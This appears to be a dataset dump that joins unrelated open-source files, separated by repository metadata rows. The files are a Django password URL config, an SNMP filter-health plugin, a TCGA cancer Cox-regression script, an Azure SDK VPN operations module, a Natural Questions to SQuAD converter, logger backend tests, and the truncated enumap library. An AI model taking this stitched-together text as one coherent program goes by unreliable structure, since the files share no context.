# along with django-xmpp-server-list. If not, see <http://www.gnu.org/licenses/>.
from django.urls import path
from . import views
# auth views are included in a separate urls file to exclude the namespace (url names are used throughout
# handy predefined templates).
urlpatterns = [
path('password_change/', views.PasswordChangeView.as_view(), name='password_change'),
path('password_reset/', views.PasswordResetView.as_view(), name='password_reset'),
path('password_reset/done/', views.PasswordResetDoneView.as_view(), name='password_reset_done'),
path('reset/<uidb64>/<token>/', views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
path('reset/done/', views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
]
| gpl-3.0 | -7,956,175,443,058,019,000 | 49.206897 | 109 | 0.752747 | false |
rsmuc/health_monitoring_plugins | health_monitoring_plugins/trustedfilter.py | 1 | 5728 | # Copyright (C) 2017-2019 rsmuc <[email protected]>
# This file is part of "Health Monitoring Plugins".
# "Health Monitoring Plugins" is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# "Health Monitoring Plugins" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with "Health Monitoring Plugins". If not, see <https://www.gnu.org/licenses/>.
from pynag.Plugins import PluginHelper,ok,warning,critical,unknown
import health_monitoring_plugins
# these dicts / definitions we need to get human readable values
states = {
1: 'ok',
2: 'failed',
3: 'absent',
4: 'AC off'
}
activity = {
1: 'standby',
2: 'active',
3: 'error'
}
# OIDs
activity_oid = '.1.3.6.1.4.1.2566.107.41.1.0' # tfDeviceActivityState
logfill_oid = '.1.3.6.1.4.1.2566.107.31.2.1.0' # slIpStatusLogFillLevel
ps1_oid = '.1.3.6.1.4.1.2566.107.31.2.2.0' # slIpStatusPowerSupplyUnit1
ps2_oid = '.1.3.6.1.4.1.2566.107.31.2.3.0' # slIpStatusPowerSupplyUnit2
fan1_oid = '.1.3.6.1.4.1.2566.107.31.2.4.0' # slIpStatusPowerFanUnit1
fan2_oid = '.1.3.6.1.4.1.2566.107.31.2.5.0' # slIpStatusPowerFanUnit2
bat_oid = '.1.3.6.1.4.1.2566.107.31.2.7.0' # slIpStatusInternalVoltage
temp_oid = '.1.3.6.1.4.1.2566.107.31.2.8.0' # slIpStatusInternalTemperature
activity_oid = '.1.3.6.1.4.1.2566.107.41.1.0' # tfDeviceActivityState
class TrustedFilter(object):
def __init__(self, helper, snmp1, snmp2=None):
self.helper = helper
self.snmp1 = snmp1
self.snmp2 = snmp2
def get_snmp_from_host1(self):
"""
Get SNMP values from 1st host.
"""
response = self.snmp1.get_oids(ps1_oid, ps2_oid, fan1_oid, fan2_oid, bat_oid, temp_oid, activity_oid, logfill_oid)
self.ps1_value = states[int(response[0])]
self.ps2_value = states[int(response[1])]
self.fan1_value = states[int(response[2])]
self.fan2_value = states[int(response[3])]
self.bat_value = states[int(response[4])]
self.temp_value = states[int(response[5])]
self.activity_value1 = activity[int(response[6])]
self.logfill_value = str(response[7])
def get_snmp_from_host2(self):
"""
Get SNMP values from 2nd host.
"""
if not self.snmp2:
self.activity_value2 = None
else:
response = self.snmp2.get_oids(activity_oid)
self.activity_value2 = activity[int(response[0])]
def check(self):
"""
Evaluate health status from device parameters.
"""
try:
self.get_snmp_from_host1()
self.get_snmp_from_host2()
except (health_monitoring_plugins.SnmpException, TypeError, KeyError):
self.helper.status(unknown)
self.helper.add_summary("SNMP response incomplete or invalid")
return
self.helper.add_summary("Filter Status")
self.helper.add_long_output("Power Supply 1: %s" % self.ps1_value)
if self.ps1_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Power Supply 1: %s" % self.ps1_value)
self.helper.add_long_output("Power Supply 2: %s" % self.ps2_value)
if self.ps2_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Power Supply 2: %s" % self.ps2_value)
self.helper.add_long_output("Fan 1: %s" % self.fan1_value)
if self.fan1_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Fan 1: %s" % self.fan1_value)
self.helper.add_long_output("Fan 2: %s" % self.fan2_value)
if self.fan2_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Fan 2: %s" % self.fan2_value)
self.helper.add_long_output("Battery: %s" % self.bat_value)
if self.bat_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Battery: %s" % self.bat_value)
self.helper.add_long_output("Temperature: %s" % self.temp_value)
if self.temp_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Temperature: %s" % self.temp_value)
self.helper.add_metric(label='logfill',value=self.logfill_value, uom="%%")
self.helper.add_long_output("Fill Level internal log: %s%%" % self.logfill_value)
self.helper.add_long_output("Activity State: %s" % self.activity_value1)
if self.activity_value1 == "error":
self.helper.status(critical)
self.helper.add_summary("Activity State: %s" % self.activity_value1)
if self.activity_value2:
self.helper.add_long_output("Activity State 2: %s" % self.activity_value2)
if self.activity_value1 == "active" and self.activity_value2 == "active":
self.helper.status(critical)
self.helper.add_summary("Filter 1 and Filter 2 active!")
if self.activity_value1 == "standby" and self.activity_value2 == "standby":
self.helper.status(critical)
self.helper.add_summary("Filter 1 and Filter 2 standby!")
self.helper.check_all_metrics()
| gpl-2.0 | 8,863,428,745,276,231,000 | 40.507246 | 122 | 0.615922 | false |
OmnesRes/onco_lnc | mrna/cox/STAD/cox_regression.py | 1 | 10031 | ## A script for finding every cox coefficient and pvalue for every mRNA in STAD Tier 3 data downloaded Jan. 5th, 2016
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re
##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
## Read the follow up data
## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file), contains the most recent
## follow up data. This code checks if the patient has already been loaded into the list, and if so, takes the more recent data.
## This required an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','clinical','nationwidechildrens.org_clinical_follow_up_v1.0_stad.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical1=[['','','']]
for i in data:
if clinical1[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[death_column]):
clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
elif re.search('^[0-9]+$',i[alive_column]):
clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
else:
pass
else:
if re.search('^[0-9]+$',i[death_column]):
clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
## Removing the empty value.
clinical=clinical1[1:]
## Grade, sex and age information were taken from the "clinical_patient" file. A dictionary was created for grade and sex.
more_clinical={}
grade_dict={}
grade_dict['G1']=1
grade_dict['G2']=2
grade_dict['G3']=3
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1
## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','clinical','nationwidechildrens.org_clinical_patient_stad.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
grade_column=columns.index('tumor_grade')
sex_column=columns.index('gender')
age_column=columns.index('age_at_initial_pathologic_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical4=[]
for i in data:
try:
more_clinical[i[patient_column]]=[grade_dict[i[grade_column]],sex_dict[i[sex_column]],int(i[age_column])]
if re.search('^[0-9]+$',i[death_column]):
clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
except:
pass
new_clinical=[]
##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
if i[0] not in [j[0] for j in clinical]:
new_clinical.append(i)
else:
if i[1]<=clinical[[j[0] for j in clinical].index(i[0])][1]:
new_clinical.append(clinical[[j[0] for j in clinical].index(i[0])])
else:
new_clinical.append(i)
##also do the reverse since clinical can contain patients not included in clinical4
for i in clinical:
if i[0] not in [j[0] for j in new_clinical]:
new_clinical.append(i)
## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in new_clinical if i[1]>0]
final_clinical=[]
## A new list containing both follow up times and grade, sex, and age is constructed.
## Only patients with grade, sex, and age information are included.
## Data is [[Patient ID, time (days), vital status, grade, sex, age at diagnosis],...]
for i in clinical:
if i[0] in more_clinical:
final_clinical.append(i+more_clinical[i[0]])
## 01 indicates a primary tumor, and only primary tumors are included in this analysis
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','FILE_SAMPLE_MAP_mrna.txt'))
f.readline()
data=[i.strip().split() for i in f if i!='\n']
## 01 indicates a primary tumor, and only primary tumors are included in this analysis
TCGA_to_mrna={}
for i in data:
## The normalized data files are used
if 'genes.normalized_results' in i[0]:
if i[1].split('-')[3][:-1]=='01':
x=''.join([k+j for k,j in zip(['','-','-'],i[1].split('-')[:3])])
TCGA_to_mrna[x]=TCGA_to_mrna.get(x,[])+[i[0]]
clinical_and_files=[]
## I only care about patients that contained complete clinical information
for i in final_clinical:
if TCGA_to_mrna.has_key(i[0]):
## The mRNA files are added to the clinical list
## Data structure: [[Patient ID, time (days), vital status, grade, sex, age at diagnosis,[mRNA files]],...]
clinical_and_files.append(i+[TCGA_to_mrna[i[0]]])
else:
pass
## A list of lists of genes is constructed, the order of gene lists is same as the clinical_and_files data
## Data structure: [[genes for patient 1], [genes for patient 2], ....]
genes=[]
for i in clinical_and_files:
temp=[]
for j in i[-1]:
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','mrna',j))
f.readline()
temp.append([[i.split('|')[1].split()[0],float(i.strip().split()[-1])] for i in f])
## In the case that the patient only contained 1 primary tumor mRNA file.
if len(temp)==1:
genes.append(temp[0])
## If the patient contained more than 1 primary tumor mRNA file
## this list comprehension will average the files for any number of files.
else:
values=[]
for k in temp:
values.append([kk[1] for kk in k])
genes.append(zip([z[0] for z in temp[0]],list(sum([np.array(kkk) for kkk in values])/float(len(temp)))))
## Only want genes that meet an expression cutoff
## A cutoff of 1 RSEM and no more than a fourth of the patients containing no expression was chosen
final_genes=[[]]*len(genes)
for i in range(len(genes[0])):
temp=[]
for j in genes:
temp.append(j[i])
count=0
for k in temp:
if k[1]==0:
count+=1
median=np.median([ii[1] for ii in temp])
if count<len(genes)/4.0 and median>1:
for index, kk in enumerate(temp):
final_genes[index]=final_genes[index]+[kk]
## This will write the final genes to a large (100-300 MB file) which could be useful for further analyses, this step can be skipped.
f=open(os.path.join(BASE_DIR,'mrna','cox','STAD','final_genes.txt'),'w')
for i in final_genes:
f.write(str(i))
f.write('\n')
f.close()
##Performing Cox regression on all of the genes in final_genes
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1
coeffs=[]
pvalues=[]
genes=[] ##This list tracks the gene names
for i in range(len(final_genes[0])):
kaplan=[]
genes.append(final_genes[0][i][0])
for k,j in zip(clinical_and_files,final_genes): ## These lists contain the clinical information and mRNA data in the same order.
kaplan.append([k[1],k[2],k[3],k[4],k[5],j[i][1]])
data=[ii[-1] for ii in kaplan] ## Grabbing all the gene values for the current gene being analyzed
ro.globalenv['expression']=ro.FloatVector(data)
res=ro.r('round(qnorm((rank(expression, na.last="keep")-0.5)/sum(!is.na(expression))), digit=5)') ## Perform inverse normal transformation
inverse_norm=list(res) ## Convert robject to python list
## Prepare the variables for rpy2
ro.globalenv['gene']=ro.FloatVector(inverse_norm)
ro.globalenv['times']=ro.IntVector([ii[0] for ii in kaplan])
ro.globalenv['died']=ro.IntVector([death_dic[ii[1]] for ii in kaplan])
##grade1
grade1=[]
for ii in kaplan:
if ii[2]==1:
grade1.append(1)
else:
grade1.append(0)
##grade2
grade2=[]
for ii in kaplan:
if ii[2]==2:
grade2.append(1)
else:
grade2.append(0)
##grade3
grade3=[]
for ii in kaplan:
if ii[2]==3:
grade3.append(1)
else:
grade3.append(0)
ro.globalenv['grade1']=ro.IntVector(grade1)
ro.globalenv['grade2']=ro.IntVector(grade2)
ro.globalenv['grade3']=ro.IntVector(grade3)
ro.globalenv['sex']=ro.IntVector([ii[3] for ii in kaplan])
ro.globalenv['age']=ro.IntVector([ii[4] for ii in kaplan])
res=ro.r('coxph(Surv(times,died) ~ gene + sex + grade1 + grade2 + grade3 + age)') ## Perform Cox regression
## Parse the string of the result with python for the gene coefficient and pvalue
for entry in str(res).split('\n'):
try:
if entry.split()[0]=='gene':
coeff=entry.split()[1]
pvalue=entry.split()[-1]
break
except:
pass
coeffs.append(coeff)
pvalues.append(pvalue)
## This will write the results to a tab delimited file with gene name, cox coefficient, and pvalue.
f=open(os.path.join(BASE_DIR,'mrna','cox','STAD','coeffs_pvalues.txt'),'w')
for i,j,k in zip(genes,coeffs,pvalues):
f.write(i)
f.write('\t')
f.write(j)
f.write('\t')
f.write(k)
f.write('\n')
f.close()
| mit | -539,384,491,624,888,770 | 32.888514 | 142 | 0.64181 | false |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/aio/operations/_vpn_sites_configuration_operations.py | 1 | 8230 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VpnSitesConfigurationOperations:
"""VpnSitesConfigurationOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _download_initial(
self,
resource_group_name: str,
virtual_wan_name: str,
request: "_models.GetVpnSitesConfigurationRequest",
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._download_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWANName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(request, 'GetVpnSitesConfigurationRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_download_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWANName}/vpnConfiguration'} # type: ignore
async def begin_download(
self,
resource_group_name: str,
virtual_wan_name: str,
request: "_models.GetVpnSitesConfigurationRequest",
**kwargs
) -> AsyncLROPoller[None]:
"""Gives the sas-url to download the configurations for vpn-sites in a resource group.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param virtual_wan_name: The name of the VirtualWAN for which configuration of all vpn-sites is
needed.
:type virtual_wan_name: str
:param request: Parameters supplied to download vpn-sites configuration.
:type request: ~azure.mgmt.network.v2020_04_01.models.GetVpnSitesConfigurationRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._download_initial(
resource_group_name=resource_group_name,
virtual_wan_name=virtual_wan_name,
request=request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualWANName': self._serialize.url("virtual_wan_name", virtual_wan_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_download.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualWans/{virtualWANName}/vpnConfiguration'} # type: ignore
| mit | 6,925,959,147,008,436,000 | 49.802469 | 200 | 0.663913 | false |
google/retrieval-qa-eval | nq_to_squad.py | 1 | 5989 | #!/usr/bin/python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Convert the Natural Questions dataset into SQuAD JSON format.
To use this utility, first follow the directions at the URL below to download
the complete training dataset.
https://ai.google.com/research/NaturalQuestions/download
Next, run this program, specifying the data you wish to convert. For instance,
the invocation:
python nq_to_squad.py\
--data_pattern=/usr/local/data/tnq/v1.0/train/*.gz\
--output_file=/usr/local/data/tnq/v1.0/train.json
will process all training data and write the results into `train.json`. This
file can, in turn, be provided to squad_eval.py using the --squad argument.
"""
import argparse
import glob
import gzip
import json
import logging
import os
import re
def clean_text(start_token, end_token, doc_tokens, doc_bytes,
ignore_final_whitespace=True):
"""Remove HTML tags from a text span and reconstruct proper spacing."""
text = ""
for index in range(start_token, end_token):
token = doc_tokens[index]
if token["html_token"]:
continue
text += token["token"]
# Add a single space between two tokens iff there is at least one
# whitespace character between them (outside of an HTML tag). For example:
#
# token1 token2 ==> Add space.
# token1</B> <B>token2 ==> Add space.
# token1</A>token2 ==> No space.
# token1<A href="..." title="...">token2 ==> No space.
# token1<SUP>2</SUP>token2 ==> No space.
next_token = token
last_index = end_token if ignore_final_whitespace else end_token + 1
for next_token in doc_tokens[index + 1:last_index]:
if not next_token["html_token"]:
break
chars = (doc_bytes[token["end_byte"]:next_token["start_byte"]]
.decode("utf-8"))
# Since some HTML tags are missing from the token list, we count '<' and
# '>' to detect if we're inside a tag.
unclosed_brackets = 0
for char in chars:
if char == "<":
unclosed_brackets += 1
elif char == ">":
unclosed_brackets -= 1
elif unclosed_brackets == 0 and re.match(r"\s", char):
# Add a single space after this token.
text += " "
break
return text
def nq_to_squad(record):
"""Convert a Natural Questions record to SQuAD format."""
doc_bytes = record["document_html"].encode("utf-8")
doc_tokens = record["document_tokens"]
# NQ training data has one annotation per JSON record.
annotation = record["annotations"][0]
short_answers = annotation["short_answers"]
# Skip examples that don't have exactly one short answer.
# Note: Consider including multi-span short answers.
if len(short_answers) != 1:
return
short_answer = short_answers[0]
long_answer = annotation["long_answer"]
# Skip examples where annotator found no long answer.
if long_answer["start_token"] == -1:
return
# Skip examples corresponding to HTML blocks other than <P>.
long_answer_html_tag = doc_tokens[long_answer["start_token"]]["token"]
if long_answer_html_tag != "<P>":
return
paragraph = clean_text(
long_answer["start_token"], long_answer["end_token"], doc_tokens,
doc_bytes)
answer = clean_text(
short_answer["start_token"], short_answer["end_token"], doc_tokens,
doc_bytes)
before_answer = clean_text(
long_answer["start_token"], short_answer["start_token"], doc_tokens,
doc_bytes, ignore_final_whitespace=False)
return {"title": record["document_title"],
"paragraphs":
[{"context": paragraph,
"qas": [{"answers": [{"answer_start": len(before_answer),
"text": answer}],
"id": record["example_id"],
"question": record["question_text"]}]}]}
def main():
parser = argparse.ArgumentParser(
description="Convert the Natural Questions to SQuAD JSON format.")
parser.add_argument("--data_pattern", dest="data_pattern",
help=("A file pattern to match the Natural Questions "
"dataset."),
metavar="PATTERN", required=True)
parser.add_argument("--version", dest="version",
help="The version label in the output file.",
metavar="LABEL", default="nq-train")
parser.add_argument("--output_file", dest="output_file",
help="The name of the SQuAD JSON formatted output file.",
metavar="FILE", default="nq_as_squad.json")
args = parser.parse_args()
root = logging.getLogger()
root.setLevel(logging.DEBUG)
records = 0
nq_as_squad = {"version": args.version, "data": []}
for file in sorted(glob.iglob(args.data_pattern)):
logging.info("opening %s", file)
with gzip.GzipFile(file, "r") as f:
for line in f:
records += 1
nq_record = json.loads(line)
squad_record = nq_to_squad(nq_record)
if squad_record:
nq_as_squad["data"].append(squad_record)
if records % 1000 == 0:
logging.info("processed %s records", records)
print("Converted %s NQ records into %s SQuAD records." %
(records, len(nq_as_squad["data"])))
with open(args.output_file, "w") as f:
json.dump(nq_as_squad, f)
if __name__ == "__main__":
main()
| apache-2.0 | -2,737,648,638,829,636,000 | 35.29697 | 79 | 0.625313 | false |
edx/event-tracking | eventtracking/backends/tests/test_logger.py | 1 | 3068 | """Test the logging backend"""
import json
import datetime
from unittest import TestCase
from unittest.mock import patch
from unittest.mock import sentinel
import pytz
from eventtracking.backends.logger import LoggerBackend
class TestLoggerBackend(TestCase):
"""Test the logging backend"""
def setUp(self):
super().setUp()
patcher = patch('eventtracking.backends.logger.logging')
self.mock_logging = patcher.start()
self.addCleanup(patcher.stop)
self.mock_logger = self.mock_logging.getLogger.return_value
# This will call the mocks
self.backend = LoggerBackend()
# Reset them so that we get "clean" mocks in our tests
self.mock_logging.reset_mock()
self.mock_logger.reset_mock()
def test_logs_to_correct_named_logger(self):
backend = LoggerBackend(name=sentinel.logger_name)
self.mock_logging.getLogger.assert_called_once_with(sentinel.logger_name)
backend.send({})
self.assert_event_emitted({})
def assert_event_emitted(self, event):
"""Asserts exactly one event was emitted"""
self.mock_logger.info.assert_called_once_with(
json.dumps(event)
)
def test_unserializable_event(self):
with self.assertRaises(TypeError):
self.backend.send({'foo': object()})
self.assert_no_events_emitted()
def assert_no_events_emitted(self):
"""Asserts no events have been emitted"""
self.assertFalse(self.mock_logger.info.called)
def test_big_event(self):
backend = LoggerBackend(max_event_size=10)
backend.send({'foo': 'a'*(backend.max_event_size + 1)})
self.assert_no_events_emitted()
def test_unlimited_event_size(self):
default_max_event_size = self.backend.max_event_size
backend = LoggerBackend(max_event_size=None)
event = {'foo': 'a'*(default_max_event_size + 1)}
backend.send(event)
self.assert_event_emitted(event)
def test_event_with_datetime_fields(self):
eastern_tz = pytz.timezone('US/Eastern')
test_time = datetime.datetime(2012, 5, 1, 7, 27, 1, 200)
event = {
'test': True,
'time': test_time,
'converted_time': eastern_tz.localize(test_time),
'date': datetime.date(2012, 5, 7)
}
self.backend.send(event)
self.assert_event_emitted({
'test': True,
'time': '2012-05-01T07:27:01.000200+00:00',
'converted_time': '2012-05-01T11:27:01.000200+00:00',
'date': '2012-05-07'
})
def test_multiple_events(self):
for event in [{'a': 'a'}, {'b': 'b'}]:
self.backend.send(event)
self.assert_event_emitted(event)
self.mock_logger.info.reset_mock()
def test_dynamic_level(self):
backend = LoggerBackend(level='warning')
backend.send({})
self.assertFalse(self.mock_logger.info.called)
self.mock_logger.warning.assert_called_once_with('{}')
| agpl-3.0 | 7,466,477,538,624,997,000 | 31.989247 | 81 | 0.617992 | false |
odoo-arg/odoo_l10n_ar | l10n_ar_invoice_presentation/test/__init__.py | 1 | 1077 | # coding: utf-8
##############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
import test_presentation
import test_presentation_purchase
import test_presentation_sale
import test_presentation_sale_iva
import test_presentation_tools
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -2,854,576,436,236,295,000 | 50.285714 | 78 | 0.651811 | false |
TadLeonard/enumap | enumap.py | 1 | 14184 | import enum
from collections import namedtuple, OrderedDict
from itertools import zip_longest
__version__ = "1.5.0"
class EnumapMeta(enum.EnumMeta):
"""An EnumMeta for friendlier, more informative REPL behavior"""
def _iter_fmt_parts(cls):
names = cls.names()
types = cls.types()
for name in names:
type_ = types.get(name)
type_info = f": {type_.__name__}" if type_ is not None else ""
yield f"{name}{type_info}"
def __repr__(cls):
lines = cls._iter_fmt_parts()
indented_lines = (" " + l for l in lines)
return f"{cls.__name__}(\n" + ",\n".join(indented_lines) + "\n)"
def __str__(cls):
parts = cls._iter_fmt_parts()
return f"{cls.__name__}(" + ", ".join(parts) + ")"
class Enumap(enum.Enum, metaclass=EnumapMeta):
"""An Enum that maps data to its ordered, named members.
Produces OrderedDicts and namedtuples while ensuring that the
keys/fields match the names of the Enum members."""
@classmethod
def names(cls):
try:
names = cls.__names
except AttributeError:
names = cls.__names = tuple(cls.__members__)
return names
@classmethod
def map(cls, *values, **named_values):
"""Returns an OrderedDict from `values` & `named_values`, whose
keys match this Enum's members and their ordering
>>> Fruit = Enumap("Fruit", names="apple orange papaya")
>>> Fruit.map("heart-shaped", "spherical", papaya="ellipsoid")
OrderedDict([('apple', 'heart-shaped'), ('orange', ...), ...])
"""
mapping = cls._make_checked_mapping(*values, **named_values)
return OrderedDict(((k, mapping[k]) for k in cls.names()))
@classmethod
def map_casted(cls, *values, **named_values):
"""Like `map`, but values are converted with the `types`
mapping. Useful for deserializing ordered and named values.
>>> class Order(str, Enumap):
... index: int = "Order ID"
... cost: Decimal = "Total pretax cost"
... due_on: arrow.get = "Delivery date"
...
>>> Order.map_casted("342 32342.23 2017-09-01".split())
OrderedDict(('index', 342), ('cost', Decimal("3242.23")), ...)
"""
mapping = cls._make_casted_mapping(*values, **named_values)
return OrderedDict(((k, mapping[k]) for k in cls.names()))
@classmethod
def tuple(cls, *values, **named_values):
"""Returns a namedtuple from `values` & `named_values`, whose
fields match this Enum's members and their ordering
>>> Tool = Enumap("Tool", names="hammer mallet forehead")
>>> Tool.tuple("small", "heavy", forehead="unwieldy")
Tool_tuple(hammer='small', mallet='heavy', forehead='unwieldy')
"""
tuple_class = cls.tuple_class()
try:
return tuple_class(*values, **named_values)
except TypeError:
mapping = cls._make_checked_mapping(*values, **named_values)
return tuple_class(**mapping)
@classmethod
def tuple_casted(cls, *values, **named_values):
"""Like `tuple`, but values are converted with the `types`
mapping. Useful for deserializing ordered and named values."""
mapping = cls._make_casted_mapping(*values, **named_values)
return cls.tuple_class()(**mapping)
@classmethod
def tuple_class(cls):
"""`namedtuple` class with fields that match this Enum's
members and their ordering"""
try:
tuple_class = cls.__tuple_class
except AttributeError:
tuple_class = namedtuple(cls.__name__ + "_tuple", cls.names())
